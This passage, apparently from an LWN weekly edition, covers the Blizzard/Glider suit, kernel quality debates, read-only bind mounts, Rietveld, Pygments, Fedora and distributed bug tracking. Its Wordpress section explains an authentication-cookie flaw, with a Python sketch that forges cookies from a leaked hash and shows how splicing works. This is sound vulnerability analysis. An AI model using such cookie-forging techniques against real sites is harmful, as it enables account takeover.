the contract they agreed to, but they are also committing copyright
infringement.  As has been seen in various file-sharing lawsuits, whenever
copyright is supposedly violated on a computer, any program
even tangentially involved in that violation is then accused of
"contributory infringement"; this is the second claim that Blizzard makes
against MDY in its suit.  Under Blizzard's interpretation, users are
allowed to copy the program into the RAM of their computer as long as they
do not violate the TOU.  If they do violate them, their license to copy to
RAM—a necessary step to be able to use the program at all—is
terminated; they are infringing Blizzard's copyright and liable for damages
starting at $750 per illegal RAM copy.  


If Blizzard's interpretation is upheld by the courts, many other acts would
also serve as copyright infringements: choosing a character name that
violates any of the thirteen name restrictions spelled out in the TOU,
transmitting or posting "any content or language which, in the sole and
absolute discretion of Blizzard, is deemed to be offensive...", or
"anything that Blizzard considers contrary to the 'essence' of the
Program", for example.  Under those conditions, Blizzard could
essentially claim copyright infringement any time it wishes, racking up
another $750+ each time the program is used.


Public Knowledge outlined two good reasons that the copyright infringement
claim should be discarded.  It is well established that it is not an
infringement if making a copy is
required to use the copyrighted material, as it is for software.
Blizzard's argument that, due to the terms of the EULA, those who buy WoW
are not "owners" but merely licensees of the software is also weak.  The
courts
have always looked on software purchases as sales, not rentals under some
company-controlled license, in much the same way that music and movies are
purchased.  Copyright owners would love to be able to eliminate the "first
sale doctrine" that allows owners to sell used books and other copyrighted
content, but the courts have so far been unwilling to go along.


One would hope that the courts would be persuaded not to see this dispute
in terms of copyright either, but there is the risk that a tool used for
"cheating" might not get the benefit of a well-reasoned view. There
have been many occasions where the US courts have made surprising
decisions regarding copyright.  Undoubtedly there are various copycat suits
waiting in the wings should such a decision be reached.  In the end,
though, neither Blizzard nor any copycats really want to go after the
actual "infringers"—also known as customers—they want to go after
others who allow users to use (or abuse) their software in ways they do not
like.  It is a classic proprietary software control strategy, and, thankfully,
something that free software users do not have to endure.


There is an interesting comparison to be made with free software licensing,
though.  Licenses like the GNU GPL also restrict behavior based on
copyright law; GPLv3, for example, makes some specific requirements on the
patent-licensing agreements that one can make with third parties.  Like
Blizzard, those who release software under a free license can make a claim
of copyright infringement (not breach of contract) if the terms of that
license are not adhered to.  There is a crucial difference, though: free
software licenses do not regulate the use of the software, only its
distribution.  By claiming that users of the software violate copyright if
it does not like their behavior, Blizzard is attempting to extend the reach
of copyright law far beyond anything seen in the free software community. 


It is certainly understandable that Blizzard would prefer that its users
did not employ Glider or other, similar software.  The company believes
that such tools unbalance the game, making it unfair to other players.  In
the past, it has temporarily or permanently banned players for using bot
software, but
Glider is evidently more difficult to detect, which led to the current
lawsuit.  


Blizzard must police its own game, however, and should not expect others
to do it on its behalf.  It is hard to see that Glider is doing anything particularly wrong
here, though Blizzard may prevail on either or both of its claims.  If
players want to find ways around things they don't like about the game,
they will, unless Blizzard finds technological means to prevent it.
It would appear that there is a substantial business
opportunity in helping players avoid some of the boring, repetitive parts
of playing the game—one that Blizzard currently ignores. 

 Though there is no direct threat to free software from this litigation
(unless one is developing free game-playing robots),
any potential expansion of copyright is worth watching.  The community
relies upon copyright law to enforce its licenses, so watching how judges
make decisions about such issues is important.  While it may be that
Blizzard is in the right to go after "cheaters" and a company that helps
them, it should not be doing that by trying to expand the reach of its
copyrights to this extreme.  

		Time to slow down?


All communities develop rituals over time.  One of the enduring
linux-kernel rituals is the regular heated discussion on development
processes and kernel quality.  To an outside observer, these events
can give the impression that the whole enterprise is about to come crashing
down.  But the reality is a lot like the New Year celebrations your editor
was privileged enough to see in Beijing: vast amounts of smoke and noise,
but everybody gets back to work as usual the next day.

Beyond that, though, discussions of this nature have real value.  Any group
which is concerned about issues like quality must, on occasion, take a step
back and evaluate the situation.  Even if there are no immediate outcomes,
the ideas raised often reverberate over the following months, sometimes
leading to real improvements.


The immediate inspiration for this round of discussion was broken systems
resulting from the 2.6.26 merge window.  This development cycle has had a
rougher start than some, with more than the usual number of patches causing
boot failures and other sorts of inconvenient behavior.  That led to some
back-and-forth between developers on how patches should be handled.  Broken
patches are unfortunate, but one thing is worth noting here: these problems
were caught and fixed even before the 2.6.26-rc1 kernel release was made.
The problems which set off this round of discussion are not bugs which will
affect Linux users.


But, beyond any doubt, there will be other bugs which are slower to surface
and slower to be fixed.  Such bugs have prompted several calls to slow
down the development process in one way or another.  To that end, it is
worth noting that the process has slowed down somewhat, with the 2.6.26
merge window bringing in far fewer changesets than were seen for 2.6.24 or
2.6.25.  Whether this slower pace will continue into future development
cycles, or whether it's simply a lull after two exceptionally busy cycles,
remains to be seen.


But, if the process does not slow down on its own, there are developers who
would like to find a way to force it to happen.  Some have argued for
simply throttling the process by, for example, limiting new features in
each development cycle to specific subsystems of the kernel.  There has
also been talk of picking the subsystems with the worst regression counts
and excluding new features from those subsystems until things improve.  The
fact of the matter, though, is that throttling is unlikely to help the
situation.  


Slowing down merging does not keep developers from developing; it just
keeps their code out of the tree.  An extreme example can be found in the
2.4 kernel: the merging of new code was heavily throttled for a long time.
What happened was that the distributors started merging new developments
themselves because their users were demanding them.  So a lot of kernels
which went under the name "2.4" were far removed from anything which could
be downloaded from kernel.org.  That way lies fragmentation - and almost
certainly lower quality as well.


Linus actually takes this argument further
by arguing that quickly merging patches leads to better quality:


	 [M]y personal belief is that the best way to raise quality of code
	 is to distribute it. Yes, as patches for discussion, but even more
	 so as a part of a cohesive whole - as _merged_ patches!

	 The thing is, the quality of individual patches isn't what
	 matters! What matters is the quality of the end result. And people
	 are going to be a lot more involved in looking at, testing, and
	 working with code that is merged, rather than code that isn't.


Andrew Morton has also argued against
throttling:


	If we simply throttled things, people would spend more time
	watching the shopping channel while merging smaller amounts of the
	same old crap.


Kernel developers are, of course, known to be hard-core shoppers, so giving
them more opportunity to pursue that activity is probably not the best
idea.  Seriously, though: Andrew is in favor of a slower development
process, but only when approached from a different angle: his point is that
an increased focus on quality will, as a side effect, result in slower
development.  Kernel developers need to be focused on finding and fixing
bugs rather than creating new ones and/or shopping.


It is worth noting that a substantial portion of the development community
appears to believe that there are no real problems in this regard.  Bugs
are being found and fixed at a high rate and the kernel is solid for most
users.  Arjan van de Ven notes:


	Are we doing worse on quality? My (subjective) opinion is that we
	are doing better than last year.  We are focused more on
	quality. We are fixing the bugs that people hit most. We are fixing
	most of the regressions (yes, not all). Subsystems are seeing flat
	or lower bugcounts/bugrates.


Ted Ts'o points out that a lot of problems
result from obscure and low-quality hardware, and that it's not possible to
make everybody happy.  Andrew is unconvinced, though, and seems to fear that
the kernel is declining in quality.


In a sense, though, that part of the discussion is moot.  Nobody would
argue against the idea that fewer bugs is a worthy goal, regardless of whether one believes
that the current process has quality problems.  So talk of ways to make
things better is always on-topic.


Testing remains a big issue; the kernel, more than almost any other
project, is highly sensitive to the systems on which it is run.  Many
problems (arguably the majority of them) are related to specific hardware,
or specific combinations of hardware; there is no way for the developers,
who do not have all possible hardware to test on, to ever find all of these
bugs.  Users have to help with that process.  Getting widespread testing
coverage is always hard; Peter Anvin argues
that the current process has actually made that harder:


	One thing is that we keep fragmenting the tester base by adding new
	confidence levels: we now have -mm, -next, mainline -git, mainline
	-rc, mainline release, stable, distro testing, and distro release
	(and some distros even have aggressive versus conservative tracks.)
	Furthermore, thanks to craniorectal immersion on the part of
	graphics vendors, a lot of users have to run proprietary drivers on
	their "main work" systems, which means they can't even test newer
	releases even if they would dare.


There is, in fact, a wealth of development kernels to test, and it is not
always clear where users and developers should be concentrating their
testing effort.  A consensus may be forming, though, that more people
should be looking at the linux-next tree in particular.  Linux-next is
where all of the patches intended for the next merge window are supposed to
congregate; the current contents of linux-next, as of this writing, are
targeted toward 2.6.27.  This is the place where early integration issues
and other problems should be found; if linux-next is well tested, the
number of problems showing up in the next merge window should be somewhat
reduced. 


The linux-next tree is an interesting experiment.  It is, for all practical
purposes, making the development cycle longer: since linux-next exists, the
2.6.27 cycle has, in some sense, already started.  Linux-next also does
something which kernel developers have tended to resist: causing the
stabilization period for one development cycle to overlap with active
development for the next cycle.  In the past, it has been argued that this
kind of overlap will cause developers to prioritize the creation of new
toys over fixing the problems with last week's toys. 


Some people argue that this is happening now: that developers are not
spending enough time dealing with bugs, and that their carelessness is
creating too many bugs in the first place.  Others assert that, while it will
never be possible to fix every reported bug, the bugs that really matter
are being addressed.  A real resolution to this disagreement seems
unlikely; the creation of meaningful metrics on kernel quality is a
difficult task.  About the best that can be done is to try to keep the
regression list as small as possible; as long as systems which once worked
continue to work, it is hard to argue too forcefully that things are headed
in the wrong direction.


		Read-only bind mounts


Bind mounts can be thought of as a sort of symbolic link at the filesystem
level.  Using mount --bind, it is possible to create a second
mount point for an existing filesystem, making that filesystem visible at a
different spot in the namespace.  Bind mounts are thus useful for creating
specific views of the filesystem namespace; one can, for example, create a
bind mount which makes a piece of a filesystem visible within an
environment which is otherwise closed off with chroot().

There is one constraint to be found with bind mounts as implemented in
kernels through 2.6.25, though: they have the same mount options as the
primary mount.  So a command like:

	mount --bind -o ro /vital_data /untrusted_container/vital_data

will fail to make /vital_data read-only under
/untrusted_container if it was mounted writable initially.  On
your editor's 2.6.25 system, the failure is silent - the bind mount will be
made writable despite the read-only request and no error message will be
generated (the mount man page does document that options cannot be
changed). 

There is clear value in the ability to make bind mounts read-only, though.
Containers are one example: an administrator may wish to create a container
in which processes may be running as root.  It may be useful for that
container to have access to filesystems on the host, but the container
should not necessarily have write access to those filesystems.  As of
2.6.26, this sort of configuration will be possible, thanks to the merging
of the read-only bind mounts patches by Dave Hansen.


As it happens, it's still not possible to create a read-only bind
mount with the command shown above; the read-only attribute can only be
added with a remount operation afterward.  So the necessary sequence is
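something like:

	mount --bind /vital_data /untrusted_container/vital_data
	mount -o remount,bind,ro /untrusted_container/vital_data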

This example raises an interesting question: what if some process opens a
file for write access between the two mount operations?  A system
administrator has the right to expect that a read-only mount will, in fact,
only be used for read operations.  The 2.6.26 patch is designed to live up
to that expectation, though the amount of work required turned out to be
more than the developers might have expected.

Filesystems normally track which files are opened for write access, so an
attempt to remount a filesystem read-only can be passed to the low-level
filesystem code for approval.  But the low-level filesystem knows nothing
about bind mounts, which are implemented entirely within the virtual
filesystem (VFS) layer.  So making read-only access for bind mounts work
requires that the VFS keep track of all files which have been opened for
write access.  Or, more precisely, the VFS really only needs to keep track
of how many files are open for write access.

The technique chosen was to create something which looks like a write lock
for filesystems.  Whenever the VFS is about to do something which involves
writing, it must first call:

	int mnt_want_write(struct vfsmount *mnt);

The return value is zero if write access is possible, or a negative error
code otherwise.  This call can be found in obvious places - such as in the
implementation of open() - when write access is requested.  But
write access comes into play in many other situations as well; for example,
renaming a file requires write access for the duration of the operation.
So mnt_want_write() calls have been sprinkled throughout the VFS
code. 

When write access is no longer needed, the "write lock" should be released
with a call to:

	void mnt_drop_write(struct vfsmount *mnt);

One of the discoveries which has been made is that write access is needed
in rather more places than one might have thought.  In particular, it turns
out that there is need for mnt_want_write() calls within the
low-level filesystems as well as in the VFS layer. So getting the
read-only bind mounts patch into shape has been an ongoing process of
finding the spots which have been missed and adding
mnt_want_write() calls there.  In an attempt to make this process
a bit less error-prone, Miklos Szeredi has put together a set of VFS helper functions
which encapsulate the situations where write access is needed.  Those
functions have not been merged for 2.6.26, however.
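
The want/drop pairing described above can be illustrated with a toy model.
This is only a sketch in Python, not kernel code: the Mount class, the
remount_read_only() and rename() helpers, and the particular error codes
returned are assumptions made for the sake of the example.

```python
import errno


class Mount:
    """Toy stand-in for a mount point; not the kernel's struct vfsmount."""

    def __init__(self, read_only=False):
        self.read_only = read_only
        self.writers = 0  # number of outstanding write accesses


def mnt_want_write(mnt):
    """Return 0 and count a writer, or a negative errno on a read-only mount."""
    if mnt.read_only:
        return -errno.EROFS
    mnt.writers += 1
    return 0


def mnt_drop_write(mnt):
    """Release one write access previously granted by mnt_want_write()."""
    mnt.writers -= 1


def remount_read_only(mnt):
    """Refuse to go read-only while any writer is still active."""
    if mnt.writers > 0:
        return -errno.EBUSY
    mnt.read_only = True
    return 0


def rename(mnt, old, new):
    """A write operation brackets its work with want/drop calls."""
    err = mnt_want_write(mnt)
    if err:
        return err
    try:
        pass  # the actual rename would happen here
    finally:
        mnt_drop_write(mnt)
    return 0
```

Every successful "want" must be matched by exactly one "drop"; a missed
drop would leave the count above zero and block any later attempt to make
the mount read-only, which is why finding all of the call sites matters.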

Superficially, mnt_want_write() is easy to understand - it simply
increments a counter of outstanding write accesses.  The problem with a
simple implementation, though, is that a shared, per-filesystem counter
would create scalability problems.  On multiprocessor systems, the cache
line containing the counter would bounce around the system, slowing things
considerably.

A common response to this type of problem is to turn the counter into a per-CPU
variable, allowing operations on the counter to remain local to each
processor.  When somebody needs to know the total value of the counters,
it's a simple matter of adding each CPU's version; this operation is slow,
but it is also rare.  On big systems, though, the number of CPUs can be
large - as can the number of filesystems, and bind mounts will only
increase that number.  The result is a multiplicative effect which, once
again, is a scalability problem, only this time it manifests itself in the
form of excessive memory use.
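
A rough sketch of the per-CPU approach and its memory cost follows.  It is
a Python model rather than kernel code; the PerCpuCounter class and the
slots_needed() helper are hypothetical names chosen for illustration.

```python
class PerCpuCounter:
    """One slot per CPU; updates touch only the local slot."""

    def __init__(self, ncpus):
        self.slots = [0] * ncpus

    def add(self, cpu, delta):
        # Fast path: only this CPU's slot is modified.
        self.slots[cpu] += delta

    def total(self):
        # Slow path: every CPU's slot must be visited.
        return sum(self.slots)


def slots_needed(ncpus, nmounts):
    """With one such counter per mount, storage grows as CPUs times mounts."""
    return ncpus * nmounts
```

With, say, 1024 processors and 500 mounts, slots_needed() yields 512,000
counter slots, which is the multiplicative effect in question.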

The read-only bind mounts patch resolves this situation by, in effect,
going back to global counters which are cached on specific processors.  To
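that end, each CPU has one of these structures:

	struct mnt_writer {
		spinlock_t lock;
		unsigned long count;
		struct vfsmount *mnt;
	} ____cacheline_aligned_in_smp;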

At any given time, this structure will hold a local count for one
filesystem, represented by mnt.  If the processor needs to adjust
the write count for that filesystem, it's a simple matter of incrementing
or decrementing count.  When the processor's attention turns to a
different filesystem, it must first adjust the global count for the old
filesystem, then it can switch its local mnt_writer structure to
the new one.  The result is a compromise between purely local and purely
global counters which yields "good enough" performance on benchmarks
designed to stress the system.
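
The caching scheme can be modeled in a few lines of Python.  This is a
simplified sketch that ignores locking entirely; the class and function
names are illustrative and the real kernel code differs in detail.

```python
class Mount:
    def __init__(self, name):
        self.name = name
        self.global_writers = 0  # shared count, touched only on a switch


class MntWriter:
    """Per-CPU cache holding a local count for one mount at a time."""

    def __init__(self):
        self.mnt = None
        self.count = 0

    def _switch_to(self, mnt):
        # Fold the local count for the old mount into its global counter,
        # then start caching the new mount.
        if self.mnt is not None:
            self.mnt.global_writers += self.count
        self.mnt = mnt
        self.count = 0

    def adjust(self, mnt, delta):
        if self.mnt is not mnt:
            self._switch_to(mnt)
        self.count += delta  # fast path: purely local


def total_writers(mnt, cpus):
    """Slow path: global count plus whatever is still cached on each CPU."""
    return mnt.global_writers + sum(w.count for w in cpus if w.mnt is mnt)
```

As long as a processor keeps working with the same filesystem, only its
local count changes; the shared counter is touched only when that
processor moves on to a different mount.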


Read-only bind mounts join with other features (such as shared subtrees) to create a
flexible set of tools for the construction of the filesystem namespace.  It
is not clear how much of this functionality is being used at this time,
but, as the implementation of containers in the mainline gets closer to
completion, there is likely to be more interest in this capability.  Linux
systems in coming years may have much more complex filesystem layouts than
have been seen in the past.

		Rietveld: another code review aid


 With the release of
Rietveld, another tool for those interested in doing web-based code
reviews is now available.  We looked at Review Board back in
January.  It was inspired by an internal Google tool, written by Python
creator and Google employee Guido van Rossum, called Mondrian.
That tool in turn spawned Rietveld.  

The feature sets of Rietveld and Review Board are strikingly similar, which
is not surprising as
they both used Mondrian as a model.  van Rossum originally wanted to turn
Mondrian into a free software project, but it was too tied to "proprietary
Google infrastructure", so he started over, with Rietveld as the result.
Both tools are implemented in Python using the Django framework, but one
major difference is that Rietveld is written to use Google App Engine. 


There are multiple ways to get a set of patches into the Rietveld system to
create an "issue" (the term used for a patch set undergoing review),
ranging from uploading a unified diff to using a Python script to
retrieve the patches from a repository.  Currently Rietveld only
supports Subversion, but van Rossum would like to see support added for
other version control systems over time.  Review Board has a bit of a head
start in this area, so it supports Mercurial, Git, Bazaar, Perforce, Subversion and CVS.


Once an issue has been created in the system, reviewers can then be invited
to comment on the changes.  Navigating through the diff is straightforward,
with JavaScript being used liberally to give an interactive "local
application" feel to the interface.  Double-clicking on a line brings up a
comment box that a reviewer can fill in to attach some comments to that
line.  All comments are held as "drafts" until the reviewer is satisfied
with their review, at which point they "publish" the comments for the author
and other reviewers to see.


The Rietveld project is
free software, released under the Apache 2.0 license, while the application
itself runs via the Google App
Engine.  Anyone can browse the system, but only those who have a Google
account can add issues and comments or conduct reviews using the tool.
Because it uses App Engine, people wanting to try it out on their
code need not find a server to install and run the application, as
would be required with Review Board; they can just upload a set of
patches, invite some reviewers, and proceed.


This kind of simplified deployment is one of the benefits that Google App
Engine is meant to provide.  For free software projects, where code review is
purposely done in the open, Rietveld provides a way to quickly try the
application out.  Those who wish to keep their source code secret may want
to install their own instance of Review Board or another tool.  It may be possible to
install Rietveld in a different environment by replacing the App
Engine-specific pieces, but that clearly is not where it is targeted.

While Rietveld does not provide much in the way of additional
functionality beyond Review Board (in fact it lags Review Board in some
areas), it does provide a very nice introduction to the Google App
Engine interface.  Developers will undoubtedly be using the code as a
template for their own ideas once Google makes more App Engine accounts
available.  Given the shared history, language, and framework, it isn't
impossible to imagine that Review Board and Rietveld might join forces one
day.  Even if they don't, some cross-pollination is inevitable, which will
result in both getting better.  Hopefully, with more projects using one or
both, better code for the community will be the result.

		Looking ahead to Mandriva Linux 2009


With Mandriva Linux 2008 Spring out the door, the first steps toward
Mandriva Linux 2009 are in progress.  Ideas are being collected on this wiki
page and Bugzilla is open for suggestions and ideas.  The wiki page
begins with instructions for entering ideas and suggestions into Bugzilla.

A number of items are on the wish list for kernel and hardware support.
The ML 2009 kernel will use libata, the one item already marked as
complete (better late than never).  Other wishes include an installed and enabled kerneloops
package, full support for Lenovo Thinkpads T60/T61 (and T62 in the future)
(with all the bells, whistles, drivers, hotkeys, LEDs, etc. working),
making Xen work properly (or dropping it), and patches for kernel-level
mode setting.

There is a request for virtualbox 1.6 to be added to the toolchain, along
with cmake and svn.  The RPM and URPMI requests include better separation of
free and non-free so that non-free sources do not get installed on an
otherwise free system, and better dependency handling.

Some requests involve making it easier to use a lightweight desktop/window
manager.  There is an Xfce edition for ML 2008.1, but some would like the
Xfce edition to be an official part of the 2009 release.  Requests for
improved icewm support are joined by requests for LXDE and Enlightenment
17.

No matter how good an installer is, there is always room for improvement and
some ideas are on the list.  The same could be said for system tools, and
several improvements to Drakxtools are also on the list.  The list ends with
suggestions for better internationalization and localization support.

For those who have ideas about improving Mandriva Linux, now is the time to
get involved.  File bug reports where features seem to be missing, and help
make ML 2009 better than ever.

		Pygments - the Python Syntax Highlighter


Pygments is a multi-language
syntax highlighter that is written in Python and distributed under
the BSD license. The project description states:


	It is a generic syntax highlighter for general use in all kinds of
	software such as forum systems, wikis or other applications that
	need to prettify source code. Highlights are:

	 - a wide range of common languages and markup formats is supported
	 - special attention is paid to details that increase highlighting
	   quality
	 - support for new languages and formats are added easily; most
	   languages use a simple regex-based lexing mechanism
	 - a number of output formats is available, among them HTML, RTF,
	   LaTeX and ANSI sequences
	 - it is usable as a command-line tool and as a library
	 - ... and it highlights even Brainf*ck!


The project FAQ notes that
Pygments supports a long (and expandable)
collection of input languages.
It can produce output as HTML, LaTeX, RTF and ANSI sequences for
console output.  The software can be run from the pygmentize
command-line tool, or accessed from your own Python code.  See the
command line reference
for details on running pygmentize.
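
As a minimal sketch of the library route, the following uses the
highlight() function together with a lexer and a formatter from the
Pygments package.  The sample source string is made up for the example,
and the details should be checked against the documentation for the
installed version.

```python
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import PythonLexer

source = 'def greet(name):\n    return "Hello, " + name\n'

# Turn the source into HTML; the markup refers to CSS classes rather
# than carrying inline colors.
html = highlight(source, PythonLexer(), HtmlFormatter())

# The matching stylesheet can be generated separately.
css = HtmlFormatter().get_style_defs(".highlight")
```

The command-line counterpart is along the lines of "pygmentize -f html -o
out.html file.py", where the file names are placeholders.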


Pygments version 0.10 was recently
announced.
Changes include the addition of 15 new language
lexers, expansion
of the Makefile lexer's capabilities, the ability to output in several
image formats, a new style and other enhancements and fixes.


Installation of Pygments was straightforward on an Ubuntu 7.04 system.
A tar.gz file was downloaded from the
Python package
site.  The file was uncompressed with gunzip and extracted with tar.
Running python setup.py install as root installed the software,
and it was ready to run.
After a quick read of the
Command Line Usage document, your author was able to run
pygmentize on some Python code and produce some rather pleasing
colorized HTML output.

The project's demo
page has a number of examples of Pygments' output; it also allows
you to upload your own code to see how it looks after formatting.


Pygments looks to be a well-designed generic tool.
It could be useful for online and offline documentation, code analysis,
education and much more.  The projects on this list
are already putting Pygments to use; perhaps your project could
make use of it as well.


		Cryptographic splicing makes for a Wordpress vulnerability


 Authentication bypass vulnerabilities are particularly painful because
they allow an attacker to access and potentially modify things that should
be off-limits.  It is important to ensure that when fixing that kind of
bug, one does not introduce a different, but equally potent, hole.  A
recent Wordpress
vulnerability clearly demonstrates the care that needs to be taken.


The problem started in November 2007, when Steven Murdoch reported
a problem with Wordpress authentication cookies.  Essentially, the
cookie that Wordpress used was an MD5 hash calculated using a value stored
in the database's user table.  Any attacker that could get read access to the
database, via a SQL injection or looking inside a database backup for example, could
generate a cookie value that would allow them access as that user.  


The password itself was not stored in the database as plaintext, but the
value used in the cookie was just a simple MD5 of the stored value.  So,
the value stored was MD5(password) and the cookie value was
MD5(MD5(password)).  Murdoch released his advisory in advance of a
fix, because the vulnerability was being actively exploited.  It was
entered as bug #5367 into
the Wordpress bug tracking system and a long conversation about how to
properly fix it ensued.
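
The weakness is easy to see in a short Python sketch.  The function names
are hypothetical, and treating the intermediate hash as a hexadecimal
string is an assumption of the example rather than a statement about the
actual Wordpress code.

```python
import hashlib


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def stored_value(password):
    """What the old scheme kept in the user table: MD5(password)."""
    return md5_hex(password)


def cookie_value(password):
    """What the old scheme put in the cookie: MD5(MD5(password))."""
    return md5_hex(md5_hex(password))


def forge_cookie(leaked_stored_value):
    """An attacker who can read the table needs only one more MD5."""
    return md5_hex(leaked_stored_value)
```

Nothing secret goes into the second hash, so the stored value is, in
effect, as good as the password for anybody who can read it.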


As part of that discussion, Murdoch suggested that a paper entitled "Dos and Don'ts of
Client Authentication on the Web" [PDF] be consulted.  The paper covers
various issues regarding cookies and the kinds of attacks that can be made
against them.  Some, but not all, of its recommendations were followed.


The new cookie scheme was released at the end of March as part of the
Wordpress
2.5 release.  Authentication cookie values were now calculated using the
following (with the '.' operator representing concatenation):

	USERNAME . '|' . EXPIRY_TIME . '|' . HMAC-MD5(USERNAME . EXPIRY_TIME)

This took into account the hazards of a straightforward hash of a stored
value and added an expiration to the cookie, but it failed to protect
against a cryptographic splicing attack.


When calculating the hash of the concatenation of the username and
expiration (along with a secret known by the server), no delimiter was used between the two.  This means that the hash
for username "foobar" with expiration "20080507" is the same as the hash
for username "foo" with expiration "bar20080507".  This allows anyone whose
username begins with another user's complete username to generate a
legitimate cookie for that other user.  Using the example above, user
"foobar" could create valid cookies for a user "foo" (or any other prefix
substring).


Many Wordpress weblogs allow new users to create an account with any name
they choose, so long as it is not already taken.  By choosing one that
starts with the administrator's username, an attacker can generate a cookie for
themselves, modify it slightly, and have a valid cookie to access the
administrator account.  No password cracking is required, nor is any access
to the database needed.
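
The collision can be demonstrated with Python's hmac module.  This is a
sketch only: the secret is made up, the use of HMAC-MD5 follows the
description above, and the delimiter variant shows one possible remedy
without claiming to reproduce what Wordpress 2.5.1 actually does.

```python
import hashlib
import hmac

SECRET = b"server-side secret"  # hypothetical key, for illustration only


def mac_no_delimiter(username, expiration):
    """MAC over username . expiration with nothing in between (flawed)."""
    message = (username + expiration).encode("utf-8")
    return hmac.new(SECRET, message, hashlib.md5).hexdigest()


def mac_with_delimiter(username, expiration):
    """Same MAC with a '|' separator; assumes usernames never contain '|'."""
    message = (username + "|" + expiration).encode("utf-8")
    return hmac.new(SECRET, message, hashlib.md5).hexdigest()
```

Here mac_no_delimiter("foobar", "20080507") and mac_no_delimiter("foo",
"bar20080507") are identical because both hash the same byte string,
while the delimited versions differ.  A separator only helps, of course,
if it cannot appear within the fields themselves.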


Wordpress 2.5.1 has been released
to address this problem.  Sites running earlier versions can disable the
registration feature and delete or suspend any user accounts with
suspicious usernames as a workaround.  If such suspicious accounts already
exist, though, it would not be surprising to find that the real
administrator no longer knows the proper password for the administrator
account.


The paper that Murdoch referenced clearly indicated the danger from
cryptographic splicing, but the Wordpress implementers must have missed
it.  Cookie authentication schemes are a necessary evil for web
applications—it would be nearly unusable to have to authenticate on
each page—but they are difficult to get right.  A careful reading of
the paper will help, as will using already vetted libraries or frameworks.
It is one of those things that is both hard to get right and extremely
important to get right.


		A Talk with Fedora Project Leader Paul Frields


Late last week I had the pleasure of talking with Fedora Project Leader
Paul Frields.  Our conversation covered a range of Fedora Project topics,
including Fedora 9, the latest Fedora release.

One thing Paul is passionate about is getting people to volunteer.  There
are many ways to get involved with the Fedora Project, lots of sub-projects
and Special Interest Groups (SIGs) that people can join depending on their
interests and talents.  The Fedora
Project wiki is a good starting point for finding out more.  The Join Fedora page also goes
into the various roles that a Fedora contributor might be suited for, with
easy links to setting up a Fedora account and using the Fedora Account
system.  You don't have to be a programmer or a computer expert to
contribute to the project.

Joining the Fedora Project is easier now than it ever was during Fedora's
five-year history.  As a result, Fedora now has over 2000 registered account
holders.  That includes about 350 ambassadors who promote Fedora in their
local area.  In addition to making it easier to become a Fedora
contributor, a variety of new web applications/collaborative tools are now
available for contributors.  Of course all Fedora infrastructure is Free
Software, available in the Fedora repository, and running on Fedora.

All registered account holders may vote in Fedora elections, which is worth
noting because there is an election coming up
in June.

The composition of the Fedora board was
recently changed so that five of the nine board seats are elected.  Four
of those seats will be voted on in the next election.  The other board
members are appointed by Red Hat, but are not necessarily Red Hat employees.
Red Hat retains some control by employing and appointing the Project
Leader.  Paul took a job with Red Hat when he was offered the position of
Project Leader.

Paul mentioned that former Fedora Project Leader Max Spevack is moving to
the Netherlands to organize and manage Fedora volunteers in Europe.  Paul
also mentioned that Fedora has many Brazilian contributors.  Of course Red
Hat employs some Fedora engineers.  There are fourteen Red Hat employees
working full time on Fedora, mostly acting as team leaders and organizing
the volunteers.  In addition, all Red Hat engineers will spend some fraction
of their time working on Fedora in areas where Red Hat Enterprise Linux is
involved.

Some people think of Fedora as a beta for Red Hat Enterprise Linux, but it's
more realistic to think of Fedora as the upstream source for its
enterprising cousin and spin-offs such as CentOS.  So even though Fedora is
a community project, Red Hat is still very involved in its development.

FUDCon (Fedora User
& Developer Conference) is an event held on an irregular schedule
several times per year.  Some are smaller events held in conjunction with a
larger event, such as the May 30, 2008 FUDCon, which will be held at
LinuxTag in Berlin, Germany.  Further out, there is some talk of having a
mini-FUDCon at the 2009 linux.conf.au.  The Boston FUDCon, coming up in
June, will run for several days.  Co-located with the Red Hat Summit, the
Boston FUDCon will feature hackfests, a barcamp and technical talks.

The Red Hat Summit will bring in Red Hat customers, and include talks about
actual use cases.  These talks should be interesting for Fedora developers,
who will have a chance to see what people are doing with their work
downstream.  FUDCon is open to anyone, so stop by if there is a FUDCon in
your area.

On to the just released Fedora 9 and the
upcoming Fedora 10.  Fedora 9 is one of the first major releases to feature
KDE 4 by default.  To make this work, the KDE SIG has built a compatibility
library to keep KDE 3 applications running properly.  For Fedora 10, Casey
Dahlin is working on replacing the init system with upstart, the system developed for Ubuntu.

Some other items that we touched on briefly: Fedora maintains an open build
system and works at getting patches upstream.  The project also strives to
cooperate with other distributions.  From what I've seen, Fedora 9 looks
very good, attractive and functional.  Now that rawhide has moved on to Fedora 10, it will be a rough ride
for at least a few days.  So stick with Fedora 9, or get it from a mirror
near you.

Fedora 9 is Paul's first release as Project Leader and he had a few words to add.  "It's been less than
five years since the first release of Fedora (back when it was called
Fedora Core), and in that time Fedora has become not just a vibrant,
innovative, and extremely popular Linux distribution, but also a thriving
community.  A community that believes that free and open source software is
not just something you *use*, it's something you *do* -- something to which
you *contribute*."

		Distributed bug tracking


It is fair to say that distributed source code management systems are
taking over the world.  There are plenty of centralized systems still in
use, but it is a rare project which would choose to adopt a centralized SCM
in 2008.  Developers have gotten too used to the idea that they can carry
the entire history of their project on their laptop, make their changes,
and merge with others at their leisure.

But, while any developer can now commit changes to a project while strapped
into a seat in a tin can flying over the Pacific Ocean, that developer
generally cannot simultaneously work with the project's bug database.
Committing changes and making bug tracker changes are activities which
often go together, but bug tracking systems remain strongly in the
centralized mode.  Our ocean-hopping developer can commit a dozen fixes,
but updating the related bug entries must wait until the plane has landed
and network connectivity has been found.


There are a number of projects out there which are trying to change this
situation through the creation of distributed bug tracking systems.  These
developments are all in a relatively early state, but their potential
- and limitations - can be seen.


One of the leading projects in this area is Bugs Everywhere, which has recently
moved to a new home with Chris Ball as its new maintainer.  Bugs
Everywhere, like the other systems investigated by your editor, tries to
work with an underlying distributed source code management system to manage
the creation and tracking of bug entries.  In particular, Bugs Everywhere
creates a new directory (called .be) in the top level of the
project's directory.  Bugs are stored as directories full of text files
within that directory, and the whole collection is managed with the
underlying SCM.


The advantages to an approach like this are clear.  The bug database can
now be downloaded along with the project's code itself.  It can be branched
along with the code; if a particular branch contains a fix for a bug, it
can also contain the updated bug tracker entry.  That, in turn, ensures
that the current bug tracking information will be merged upstream at
exactly the same time as the fix itself.  Contemporary projects are
characterized by large numbers of repositories and branches, each of which
can contain a different set of bugs and fixes; distributing the bug
database into these repositories can only help to keep the code and its bug
information consistent everywhere.


There are also some disadvantages to this scheme, at least in its current
form.  Changes to bug entries don't become real until they are committed
